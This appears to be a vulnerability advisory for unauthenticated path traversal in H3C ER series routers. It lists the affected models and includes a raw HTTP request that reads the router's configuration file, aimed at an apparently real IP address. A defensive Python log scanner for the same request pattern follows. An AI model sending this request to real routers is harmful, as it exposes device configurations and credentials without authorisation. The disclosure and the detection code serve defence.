
Unauthorized vulnerabilities exist in H3C-ER system management


CJCniubi666/H3C-ER


H3C ER series router system management has unauthorized access vulnerability

Product: ER series router

Version: ER3260G2, ER5200G2, ER3200G2, ER2100n, ER6300G2, ER5100G2, ER2200G2

Rating: high-risk

Website: http://www.h3c.com/

Hazards: Attackers can exploit this vulnerability to obtain sensitive information from routers by constructing special request packets to bypass identity verification.

Principle: The router does not authenticate access to directories and related files.

Exp:

Note: The ER5200G2 in the URL needs to be changed to the corresponding model.

GET /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg HTTP/1.1
Host: 58.221.11.74:12345
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
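
A log check for the request shape shown above, as an added example that is not part of the original repository: it normalises each request target and flags any that use `..` segments to reach a `.cfg` file. The common-log-format layout, the sample lines and the function names are assumptions, and the check goes slightly beyond the literal request by also decoding percent-encoded dot segments.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Models named in the advisory; the exposed file is <model>.cfg.
MODELS = {"ER3260G2", "ER5200G2", "ER3200G2", "ER2100n",
          "ER6300G2", "ER5100G2", "ER2200G2"}
# Assumed log layout: common log format (client first, then "METHOD target HTTP/x" status).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /userLogin.asp HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg HTTP/1.1" 200 40960',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /userLogin.asp/%2e%2e/ER3200G2.cfg HTTP/1.1" 200 40960',
    '203.0.113.9 - - [01/Jan/2024:10:02:30 +0000] "GET /userLogin.asp/../router.cfg HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Jan/2024:10:03:00 +0000] "GET /images/../css/style.css HTTP/1.1" 200 900',
]


def resolve_cfg_traversal(target):
    """Return the normalised path if target uses '..' to reach a *.cfg file, else None."""
    path = urlsplit(target).path
    for _ in range(3):  # bounded decode so encoded dot segments are not missed
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    if ".." not in path.split("/"):
        return None
    resolved = posixpath.normpath(path)
    return resolved if resolved.lower().endswith(".cfg") else None


def scan(lines):
    """Return one finding per log line whose request traverses to a config file."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        resolved = resolve_cfg_traversal(match["target"]) if match else None
        if resolved is None:
            continue
        stem = posixpath.splitext(posixpath.basename(resolved))[0]
        findings.append({"client": line.split()[0], "resolved": resolved,
                         "known_model": stem in MODELS,
                         "served": match["status"] == "200"})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with both `served` and `known_model` set means the device answered such a request with a 200, so the contents of that configuration file should be treated as disclosed.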

Sphere of influence: H3C router management, part of the ER series

The address of the vulnerability:

Screenshots of the rest of the ER series:

ER5200G2: (screenshots)
